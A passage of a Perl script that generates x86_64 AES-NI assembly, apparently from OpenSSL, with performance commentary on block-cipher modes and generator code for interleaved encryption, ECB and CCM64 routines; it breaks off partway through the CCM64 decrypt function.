# CTR 5.42/5.42 1.92/1.92 1.44/1.44 1.28/1.28 1.26/1.26
# CBC 4.38/4.43 4.15/1.43 4.07/1.32 4.07/1.29 4.06/1.28
# CCM 5.66/9.42 4.42/5.41 4.16/4.40 4.09/4.15 4.06/4.07
# OFB 5.42/5.42 4.64/4.64 4.44/4.44 4.39/4.39 4.38/4.38
# CFB 5.73/5.85 5.56/5.62 5.48/5.56 5.47/5.55 5.47/5.55
#
# ECB, CTR, CBC and CCM results are free from EVP overhead. This means
# that otherwise used 'openssl speed -evp aes-128-??? -engine aesni
# [-decrypt]' will exhibit 10-15% worse results for smaller blocks.
# The results were collected with specially crafted speed.c benchmark
# in order to compare them with results reported in "Intel Advanced
# Encryption Standard (AES) New Instruction Set" White Paper Revision
# 3.0 dated May 2010. All above results are consistently better. This
# module also provides better performance for block sizes smaller than
# 128 bytes in points *not* represented in the above table.
#
# Looking at the results for 8-KB buffer.
#
# CFB and OFB results are far from the limit, because implementation
# uses "generic" CRYPTO_[c|o]fb128_encrypt interfaces relying on
# single-block aesni_encrypt, which is not the most optimal way to go.
# CBC encrypt result is unexpectedly high and there is no documented
# explanation for it. Seemingly there is a small penalty for feeding
# the result back to AES unit the way it's done in CBC mode. There is
# nothing one can do and the result appears optimal. CCM result is
# identical to CBC, because CBC-MAC is essentially CBC encrypt without
# saving output. CCM CTR "stays invisible," because it's neatly
# interleaved with CBC-MAC. This provides ~30% improvement over
# "straightforward" CCM implementation with CTR and CBC-MAC performed
# disjointly. Parallelizable modes practically achieve the theoretical
# limit.
#
# Looking at how results vary with buffer size.
#
# Curves are practically saturated at 1-KB buffer size. In most cases
# "256-byte" performance is >95%, and "64-byte" is ~90% of "8-KB" one.
# CTR curve doesn't follow this pattern and is "slowest" changing one
# with "256-byte" result being 87% of "8-KB." This is because overhead
# in CTR mode is most computationally intensive. Small-block CCM
# decrypt is slower than encrypt, because first CTR and last CBC-MAC
# iterations can't be interleaved.
#
# Results for 192- and 256-bit keys.
#
# EVP-free results were observed to scale perfectly with number of
# rounds for larger block sizes, i.e. 192-bit result being 10/12 times
# lower and 256-bit one - 10/14. Well, in CBC encrypt case differences
# are a tad smaller, because the above mentioned penalty biases all
# results by same constant value. In similar way function call
# overhead affects small-block performance, as well as OFB and CFB
# results. Differences are not large, most common coefficients are
# 10/11.7 and 10/13.4 (as opposite to 10/12.0 and 10/14.0), but one
# observe even 10/11.2 and 10/12.4 (CTR, OFB, CFB)...
# January 2011
#
# While Westmere processor features 6 cycles latency for aes[enc|dec]
# instructions, which can be scheduled every second cycle, Sandy
# Bridge spends 8 cycles per instruction, but it can schedule them
# every cycle. This means that code targeting Westmere would perform
# suboptimally on Sandy Bridge. Therefore this update.
#
# In addition, non-parallelizable CBC encrypt (as well as CCM) is
# optimized. Relative improvement might appear modest, 8% on Westmere,
# but in absolute terms it's 3.77 cycles per byte encrypted with
# 128-bit key on Westmere, and 5.07 - on Sandy Bridge. These numbers
# should be compared to asymptotic limits of 3.75 for Westmere and
# 5.00 for Sandy Bridge. Actually, the fact that they get this close
# to asymptotic limits is quite amazing. Indeed, the limit is
# calculated as latency times number of rounds, 10 for 128-bit key,
# and divided by 16, the number of bytes in block, or in other words
# it accounts *solely* for aesenc instructions. But there are extra
# instructions, and numbers so close to the asymptotic limits mean
# that it's as if it takes as little as *one* additional cycle to
# execute all of them. How is it possible? It is possible thanks to
# out-of-order execution logic, which manages to overlap post-
# processing of previous block, things like saving the output, with
# actual encryption of current block, as well as pre-processing of
# current block, things like fetching input and xor-ing it with
# 0-round element of the key schedule, with actual encryption of
# previous block. Keep this in mind...
#
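# To make that calculation concrete, using only the figures quoted above:
#
#	Westmere, 128-bit key:		6 cycles * 10 rounds / 16 bytes = 3.75 cycles/byte
#	Sandy Bridge, 128-bit key:	8 cycles * 10 rounds / 16 bytes = 5.00 cycles/byte
#
# and dividing the Westmere figure by the 3x instruction interleave factor
# discussed in the next paragraph recovers the 1.25 cycles per byte quoted
# earlier for parallelizable modes.
#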
# For parallelizable modes, such as ECB, CBC decrypt, CTR, higher
# performance is achieved by interleaving instructions working on
# independent blocks. In which case asymptotic limit for such modes
# can be obtained by dividing above mentioned numbers by AES
# instructions' interleave factor. Westmere can execute at most 3
# instructions at a time, meaning that optimal interleave factor is 3,
# and that's where the "magic" number of 1.25 come from. "Optimal
# interleave factor" means that increase of interleave factor does
# not improve performance. The formula has proven to reflect reality
# pretty well on Westmere... Sandy Bridge on the other hand can
# execute up to 8 AES instructions at a time, so how does varying
# interleave factor affect the performance? Here is table for ECB
# (numbers are cycles per byte processed with 128-bit key):
#
# instruction interleave factor 3x 6x 8x
# theoretical asymptotic limit 1.67 0.83 0.625
# measured performance for 8KB block 1.05 0.86 0.84
#
# "as if" interleave factor 4.7x 5.8x 6.0x
#
# Further data for other parallelizable modes:
#
# CBC decrypt 1.16 0.93 0.93
# CTR 1.14 0.91 n/a
#
# Well, given 3x column it's probably inappropriate to call the limit
# asymptotic, if it can be surpassed, isn't it? What happens there?
# Rewind to CBC paragraph for the answer. Yes, out-of-order execution
# magic is responsible for this. Processor overlaps not only the
# additional instructions with AES ones, but even AES instructions
# processing adjacent triplets of independent blocks. In the 6x case
# additional instructions still claim disproportionally small amount
# of additional cycles, but in 8x case number of instructions must be
# a tad too high for out-of-order logic to cope with, and AES unit
# remains underutilized... As you can see 8x interleave is hardly
# justifiable, so there is no need to feel bad that 32-bit aesni-x86.pl
# utilizes 6x interleave because of limited register bank capacity.
#
# Higher interleave factors do have negative impact on Westmere
# performance. While for ECB mode it's negligible ~1.5%, other
# parallelizables perform ~5% worse, which is outweighed by ~25%
# improvement on Sandy Bridge. To balance regression on Westmere
# CTR mode was implemented with 6x aesenc interleave factor.
# April 2011
#
# Add aesni_xts_[en|de]crypt. Westmere spends 1.33 cycles processing
# one byte out of 8KB with 128-bit key, Sandy Bridge - 0.97. Just like
# in CTR mode AES instruction interleave factor was chosen to be 6x.
$PREFIX="aesni"; # if $PREFIX is set to "AES", the script
# generates drop-in replacement for
# crypto/aes/asm/aes-x86_64.pl:-)
$flavour = shift;
$output = shift;
if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
die "can't locate x86_64-xlate.pl";
open OUT,"| \"$^X\" $xlate $flavour $output";
*STDOUT=*OUT;
$movkey = $PREFIX eq "aesni" ? "movups" : "movups";
@_4args=$win64? ("%rcx","%rdx","%r8", "%r9") : # Win64 order
("%rdi","%rsi","%rdx","%rcx"); # Unix order
$code=".text\n";
$rounds="%eax"; # input to and changed by aesni_[en|de]cryptN !!!
# this is natural Unix argument order for public $PREFIX_[ecb|cbc]_encrypt ...
$inp="%rdi";
$out="%rsi";
$len="%rdx";
$key="%rcx"; # input to and changed by aesni_[en|de]cryptN !!!
$ivp="%r8"; # cbc, ctr, ...
$rnds_="%r10d"; # backup copy for $rounds
$key_="%r11"; # backup copy for $key
# %xmm register layout
$rndkey0="%xmm0"; $rndkey1="%xmm1";
$inout0="%xmm2"; $inout1="%xmm3";
$inout2="%xmm4"; $inout3="%xmm5";
$inout4="%xmm6"; $inout5="%xmm7";
$inout6="%xmm8"; $inout7="%xmm9";
$in2="%xmm6"; $in1="%xmm7"; # used in CBC decrypt, CTR, ...
$in0="%xmm8"; $iv="%xmm9";
# Inline version of internal aesni_[en|de]crypt1.
#
# Why folded loop? Because aes[enc|dec] is slow enough to accommodate
# cycles which take care of loop variables...
{ my $sn;
sub aesni_generate1 {
my ($p,$key,$rounds,$inout,$ivec)=@_; $inout=$inout0 if (!defined($inout));
++$sn;
$code.=<<___;
$movkey ($key),$rndkey0
$movkey 16($key),$rndkey1
___
$code.=<<___ if (defined($ivec));
xorps $rndkey0,$ivec
lea 32($key),$key
xorps $ivec,$inout
___
$code.=<<___ if (!defined($ivec));
lea 32($key),$key
xorps $rndkey0,$inout
___
$code.=<<___;
.Loop_${p}1_$sn:
aes${p} $rndkey1,$inout
dec $rounds
$movkey ($key),$rndkey1
lea 16($key),$key
jnz .Loop_${p}1_$sn # loop body is 16 bytes
aes${p}last $rndkey1,$inout
___
}}
# void $PREFIX_[en|de]crypt (const void *inp,void *out,const AES_KEY *key);
#
{ my ($inp,$out,$key) = @_4args;
$code.=<<___;
.globl ${PREFIX}_encrypt
.type ${PREFIX}_encrypt,\@abi-omnipotent
.align 16
${PREFIX}_encrypt:
movups ($inp),$inout0 # load input
mov 240($key),$rounds # key->rounds
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
movups $inout0,($out) # output
ret
.size ${PREFIX}_encrypt,.-${PREFIX}_encrypt
.globl ${PREFIX}_decrypt
.type ${PREFIX}_decrypt,\@abi-omnipotent
.align 16
${PREFIX}_decrypt:
movups ($inp),$inout0 # load input
mov 240($key),$rounds # key->rounds
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
movups $inout0,($out) # output
ret
.size ${PREFIX}_decrypt, .-${PREFIX}_decrypt
___
}
# _aesni_[en|de]cryptN are private interfaces, N denotes interleave
# factor. Why 3x subroutine were originally used in loops? Even though
# aes[enc|dec] latency was originally 6, it could be scheduled only
# every *2nd* cycle. Thus 3x interleave was the one providing optimal
# utilization, i.e. when subroutine's throughput is virtually same as
# of non-interleaved subroutine [for number of input blocks up to 3].
# This is why it makes no sense to implement 2x subroutine.
# aes[enc|dec] latency in next processor generation is 8, but the
# instructions can be scheduled every cycle. Optimal interleave for
# new processor is therefore 8x...
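# In other words, a rough rule of thumb implied by the above is
#
#	optimal interleave ~= instruction latency / issue interval,
#
# i.e. 6/2 = 3x on the original parts and 8/1 = 8x on the newer generation,
# which is why 3x, 4x, 6x and 8x code paths are generated below.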
sub aesni_generate3 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-2] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt3,\@abi-omnipotent
.align 16
_aesni_${dir}rypt3:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
xorps $rndkey0,$inout1
xorps $rndkey0,$inout2
$movkey ($key),$rndkey0
.L${dir}_loop3:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
$movkey 16($key),$rndkey1
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
$movkey ($key),$rndkey0
jnz .L${dir}_loop3
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
ret
.size _aesni_${dir}rypt3,.-_aesni_${dir}rypt3
___
}
# 4x interleave is implemented to improve small block performance,
# most notably [and naturally] the 4-block case by ~30%. One can argue that one
# should have implemented 5x as well, but improvement would be <20%,
# so it's not worth it...
sub aesni_generate4 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-3] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt4,\@abi-omnipotent
.align 16
_aesni_${dir}rypt4:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
xorps $rndkey0,$inout1
xorps $rndkey0,$inout2
xorps $rndkey0,$inout3
$movkey ($key),$rndkey0
.L${dir}_loop4:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
$movkey 16($key),$rndkey1
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
aes${dir} $rndkey0,$inout3
$movkey ($key),$rndkey0
jnz .L${dir}_loop4
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
aes${dir}last $rndkey0,$inout3
ret
.size _aesni_${dir}rypt4,.-_aesni_${dir}rypt4
___
}
sub aesni_generate6 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-5] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt6,\@abi-omnipotent
.align 16
_aesni_${dir}rypt6:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
pxor $rndkey0,$inout1
aes${dir} $rndkey1,$inout0
pxor $rndkey0,$inout2
aes${dir} $rndkey1,$inout1
pxor $rndkey0,$inout3
aes${dir} $rndkey1,$inout2
pxor $rndkey0,$inout4
aes${dir} $rndkey1,$inout3
pxor $rndkey0,$inout5
dec $rounds
aes${dir} $rndkey1,$inout4
$movkey ($key),$rndkey0
aes${dir} $rndkey1,$inout5
jmp .L${dir}_loop6_enter
.align 16
.L${dir}_loop6:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
.L${dir}_loop6_enter: # happens to be 16-byte aligned
$movkey 16($key),$rndkey1
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
aes${dir} $rndkey0,$inout3
aes${dir} $rndkey0,$inout4
aes${dir} $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .L${dir}_loop6
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
aes${dir}last $rndkey0,$inout3
aes${dir}last $rndkey0,$inout4
aes${dir}last $rndkey0,$inout5
ret
.size _aesni_${dir}rypt6,.-_aesni_${dir}rypt6
___
}
sub aesni_generate8 {
my $dir=shift;
# As already mentioned it takes in $key and $rounds, which are *not*
# preserved. $inout[0-7] is cipher/clear text...
$code.=<<___;
.type _aesni_${dir}rypt8,\@abi-omnipotent
.align 16
_aesni_${dir}rypt8:
$movkey ($key),$rndkey0
shr \$1,$rounds
$movkey 16($key),$rndkey1
lea 32($key),$key
xorps $rndkey0,$inout0
xorps $rndkey0,$inout1
aes${dir} $rndkey1,$inout0
pxor $rndkey0,$inout2
aes${dir} $rndkey1,$inout1
pxor $rndkey0,$inout3
aes${dir} $rndkey1,$inout2
pxor $rndkey0,$inout4
aes${dir} $rndkey1,$inout3
pxor $rndkey0,$inout5
dec $rounds
aes${dir} $rndkey1,$inout4
pxor $rndkey0,$inout6
aes${dir} $rndkey1,$inout5
pxor $rndkey0,$inout7
$movkey ($key),$rndkey0
aes${dir} $rndkey1,$inout6
aes${dir} $rndkey1,$inout7
$movkey 16($key),$rndkey1
jmp .L${dir}_loop8_enter
.align 16
.L${dir}_loop8:
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
dec $rounds
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
aes${dir} $rndkey1,$inout6
aes${dir} $rndkey1,$inout7
$movkey 16($key),$rndkey1
.L${dir}_loop8_enter: # happens to be 16-byte aligned
aes${dir} $rndkey0,$inout0
aes${dir} $rndkey0,$inout1
lea 32($key),$key
aes${dir} $rndkey0,$inout2
aes${dir} $rndkey0,$inout3
aes${dir} $rndkey0,$inout4
aes${dir} $rndkey0,$inout5
aes${dir} $rndkey0,$inout6
aes${dir} $rndkey0,$inout7
$movkey ($key),$rndkey0
jnz .L${dir}_loop8
aes${dir} $rndkey1,$inout0
aes${dir} $rndkey1,$inout1
aes${dir} $rndkey1,$inout2
aes${dir} $rndkey1,$inout3
aes${dir} $rndkey1,$inout4
aes${dir} $rndkey1,$inout5
aes${dir} $rndkey1,$inout6
aes${dir} $rndkey1,$inout7
aes${dir}last $rndkey0,$inout0
aes${dir}last $rndkey0,$inout1
aes${dir}last $rndkey0,$inout2
aes${dir}last $rndkey0,$inout3
aes${dir}last $rndkey0,$inout4
aes${dir}last $rndkey0,$inout5
aes${dir}last $rndkey0,$inout6
aes${dir}last $rndkey0,$inout7
ret
.size _aesni_${dir}rypt8,.-_aesni_${dir}rypt8
___
}
&aesni_generate3("enc") if ($PREFIX eq "aesni");
&aesni_generate3("dec");
&aesni_generate4("enc") if ($PREFIX eq "aesni");
&aesni_generate4("dec");
&aesni_generate6("enc") if ($PREFIX eq "aesni");
&aesni_generate6("dec");
&aesni_generate8("enc") if ($PREFIX eq "aesni");
&aesni_generate8("dec");
if ($PREFIX eq "aesni") {
########################################################################
# void aesni_ecb_encrypt (const void *in, void *out,
# size_t length, const AES_KEY *key,
# int enc);
$code.=<<___;
.globl aesni_ecb_encrypt
.type aesni_ecb_encrypt,\@function,5
.align 16
aesni_ecb_encrypt:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lecb_enc_body:
___
$code.=<<___;
and \$-16,$len
jz .Lecb_ret
mov 240($key),$rounds # key->rounds
$movkey ($key),$rndkey0
mov $key,$key_ # backup $key
mov $rounds,$rnds_ # backup $rounds
test %r8d,%r8d # 5th argument
jz .Lecb_decrypt
#--------------------------- ECB ENCRYPT ------------------------------#
cmp \$0x80,$len
jb .Lecb_enc_tail
movdqu ($inp),$inout0
movdqu 0x10($inp),$inout1
movdqu 0x20($inp),$inout2
movdqu 0x30($inp),$inout3
movdqu 0x40($inp),$inout4
movdqu 0x50($inp),$inout5
movdqu 0x60($inp),$inout6
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
sub \$0x80,$len
jmp .Lecb_enc_loop8_enter
.align 16
.Lecb_enc_loop8:
movups $inout0,($out)
mov $key_,$key # restore $key
movdqu ($inp),$inout0
mov $rnds_,$rounds # restore $rounds
movups $inout1,0x10($out)
movdqu 0x10($inp),$inout1
movups $inout2,0x20($out)
movdqu 0x20($inp),$inout2
movups $inout3,0x30($out)
movdqu 0x30($inp),$inout3
movups $inout4,0x40($out)
movdqu 0x40($inp),$inout4
movups $inout5,0x50($out)
movdqu 0x50($inp),$inout5
movups $inout6,0x60($out)
movdqu 0x60($inp),$inout6
movups $inout7,0x70($out)
lea 0x80($out),$out
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
.Lecb_enc_loop8_enter:
call _aesni_encrypt8
sub \$0x80,$len
jnc .Lecb_enc_loop8
movups $inout0,($out)
mov $key_,$key # restore $key
movups $inout1,0x10($out)
mov $rnds_,$rounds # restore $rounds
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
movups $inout7,0x70($out)
lea 0x80($out),$out
add \$0x80,$len
jz .Lecb_ret
.Lecb_enc_tail:
movups ($inp),$inout0
cmp \$0x20,$len
jb .Lecb_enc_one
movups 0x10($inp),$inout1
je .Lecb_enc_two
movups 0x20($inp),$inout2
cmp \$0x40,$len
jb .Lecb_enc_three
movups 0x30($inp),$inout3
je .Lecb_enc_four
movups 0x40($inp),$inout4
cmp \$0x60,$len
jb .Lecb_enc_five
movups 0x50($inp),$inout5
je .Lecb_enc_six
movdqu 0x60($inp),$inout6
call _aesni_encrypt8
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_one:
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
movups $inout0,($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_two:
xorps $inout2,$inout2
call _aesni_encrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_three:
call _aesni_encrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_four:
call _aesni_encrypt4
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_five:
xorps $inout5,$inout5
call _aesni_encrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
jmp .Lecb_ret
.align 16
.Lecb_enc_six:
call _aesni_encrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
jmp .Lecb_ret
#--------------------------- ECB DECRYPT ------------------------------#
.align 16
.Lecb_decrypt:
cmp \$0x80,$len
jb .Lecb_dec_tail
movdqu ($inp),$inout0
movdqu 0x10($inp),$inout1
movdqu 0x20($inp),$inout2
movdqu 0x30($inp),$inout3
movdqu 0x40($inp),$inout4
movdqu 0x50($inp),$inout5
movdqu 0x60($inp),$inout6
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
sub \$0x80,$len
jmp .Lecb_dec_loop8_enter
.align 16
.Lecb_dec_loop8:
movups $inout0,($out)
mov $key_,$key # restore $key
movdqu ($inp),$inout0
mov $rnds_,$rounds # restore $rounds
movups $inout1,0x10($out)
movdqu 0x10($inp),$inout1
movups $inout2,0x20($out)
movdqu 0x20($inp),$inout2
movups $inout3,0x30($out)
movdqu 0x30($inp),$inout3
movups $inout4,0x40($out)
movdqu 0x40($inp),$inout4
movups $inout5,0x50($out)
movdqu 0x50($inp),$inout5
movups $inout6,0x60($out)
movdqu 0x60($inp),$inout6
movups $inout7,0x70($out)
lea 0x80($out),$out
movdqu 0x70($inp),$inout7
lea 0x80($inp),$inp
.Lecb_dec_loop8_enter:
call _aesni_decrypt8
$movkey ($key_),$rndkey0
sub \$0x80,$len
jnc .Lecb_dec_loop8
movups $inout0,($out)
mov $key_,$key # restore $key
movups $inout1,0x10($out)
mov $rnds_,$rounds # restore $rounds
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
movups $inout7,0x70($out)
lea 0x80($out),$out
add \$0x80,$len
jz .Lecb_ret
.Lecb_dec_tail:
movups ($inp),$inout0
cmp \$0x20,$len
jb .Lecb_dec_one
movups 0x10($inp),$inout1
je .Lecb_dec_two
movups 0x20($inp),$inout2
cmp \$0x40,$len
jb .Lecb_dec_three
movups 0x30($inp),$inout3
je .Lecb_dec_four
movups 0x40($inp),$inout4
cmp \$0x60,$len
jb .Lecb_dec_five
movups 0x50($inp),$inout5
je .Lecb_dec_six
movups 0x60($inp),$inout6
$movkey ($key),$rndkey0
call _aesni_decrypt8
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
movups $inout6,0x60($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_one:
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
movups $inout0,($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_two:
xorps $inout2,$inout2
call _aesni_decrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_three:
call _aesni_decrypt3
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_four:
call _aesni_decrypt4
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_five:
xorps $inout5,$inout5
call _aesni_decrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
jmp .Lecb_ret
.align 16
.Lecb_dec_six:
call _aesni_decrypt6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
.Lecb_ret:
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
.Lecb_enc_ret:
___
$code.=<<___;
ret
.size aesni_ecb_encrypt,.-aesni_ecb_encrypt
___
{
######################################################################
# void aesni_ccm64_[en|de]crypt_blocks (const void *in, void *out,
# size_t blocks, const AES_KEY *key,
# const char *ivec,char *cmac);
#
# Handles only complete blocks, operates on 64-bit counter and
# does not update *ivec! Nor does it finalize CMAC value
# (see engine/eng_aesni.c for details)
#
{
my $cmac="%r9"; # 6th argument
my $increment="%xmm6";
my $bswap_mask="%xmm7";
$code.=<<___;
.globl aesni_ccm64_encrypt_blocks
.type aesni_ccm64_encrypt_blocks,\@function,6
.align 16
aesni_ccm64_encrypt_blocks:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lccm64_enc_body:
___
$code.=<<___;
mov 240($key),$rounds # key->rounds
movdqu ($ivp),$iv
movdqa .Lincrement64(%rip),$increment
movdqa .Lbswap_mask(%rip),$bswap_mask
shr \$1,$rounds
lea 0($key),$key_
movdqu ($cmac),$inout1
movdqa $iv,$inout0
mov $rounds,$rnds_
pshufb $bswap_mask,$iv
jmp .Lccm64_enc_outer
.align 16
.Lccm64_enc_outer:
$movkey ($key_),$rndkey0
mov $rnds_,$rounds
movups ($inp),$in0 # load inp
xorps $rndkey0,$inout0 # counter
$movkey 16($key_),$rndkey1
xorps $in0,$rndkey0
lea 32($key_),$key
xorps $rndkey0,$inout1 # cmac^=inp
$movkey ($key),$rndkey0
.Lccm64_enc2_loop:
aesenc $rndkey1,$inout0
dec $rounds
aesenc $rndkey1,$inout1
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
lea 32($key),$key
aesenc $rndkey0,$inout1
$movkey 0($key),$rndkey0
jnz .Lccm64_enc2_loop
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
paddq $increment,$iv
aesenclast $rndkey0,$inout0
aesenclast $rndkey0,$inout1
dec $len
lea 16($inp),$inp
xorps $inout0,$in0 # inp ^= E(iv)
movdqa $iv,$inout0
movups $in0,($out) # save output
lea 16($out),$out
pshufb $bswap_mask,$inout0
jnz .Lccm64_enc_outer
movups $inout1,($cmac)
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
.Lccm64_enc_ret:
___
$code.=<<___;
ret
.size aesni_ccm64_encrypt_blocks,.-aesni_ccm64_encrypt_blocks
___
######################################################################
$code.=<<___;
.globl aesni_ccm64_decrypt_blocks
.type aesni_ccm64_decrypt_blocks,\@function,6
.align 16
aesni_ccm64_decrypt_blocks:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lccm64_dec_body:
___
$code.=<<___;
mov 240($key),$rounds # key->rounds
movups ($ivp),$iv
movdqu ($cmac),$inout1
movdqa .Lincrement64(%rip),$increment
movdqa .Lbswap_mask(%rip),$bswap_mask
movaps $iv,$inout0
mov $rounds,$rnds_
mov $key,$key_
pshufb $bswap_mask,$iv
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
movups ($inp),$in0 # load inp
paddq $increment,$iv
lea 16($inp),$inp
jmp .Lccm64_dec_outer
.align 16
.Lccm64_dec_outer:
xorps $inout0,$in0 # inp ^= E(iv)
movdqa $iv,$inout0
mov $rnds_,$rounds
movups $in0,($out) # save output
lea 16($out),$out
pshufb $bswap_mask,$inout0
sub \$1,$len
jz .Lccm64_dec_break
$movkey ($key_),$rndkey0
shr \$1,$rounds
$movkey 16($key_),$rndkey1
xorps $rndkey0,$in0
lea 32($key_),$key
xorps $rndkey0,$inout0
xorps $in0,$inout1 # cmac^=out
$movkey ($key),$rndkey0
.Lccm64_dec2_loop:
aesenc $rndkey1,$inout0
dec $rounds
aesenc $rndkey1,$inout1
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
lea 32($key),$key
aesenc $rndkey0,$inout1
$movkey 0($key),$rndkey0
jnz .Lccm64_dec2_loop
movups ($inp),$in0 # load inp
paddq $increment,$iv
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
lea 16($inp),$inp
aesenclast $rndkey0,$inout0
aesenclast $rndkey0,$inout1
jmp .Lccm64_dec_outer
.align 16
.Lccm64_dec_break:
#xorps $in0,$inout1 # cmac^=out
___
&aesni_generate1("enc",$key_,$rounds,$inout1,$in0);
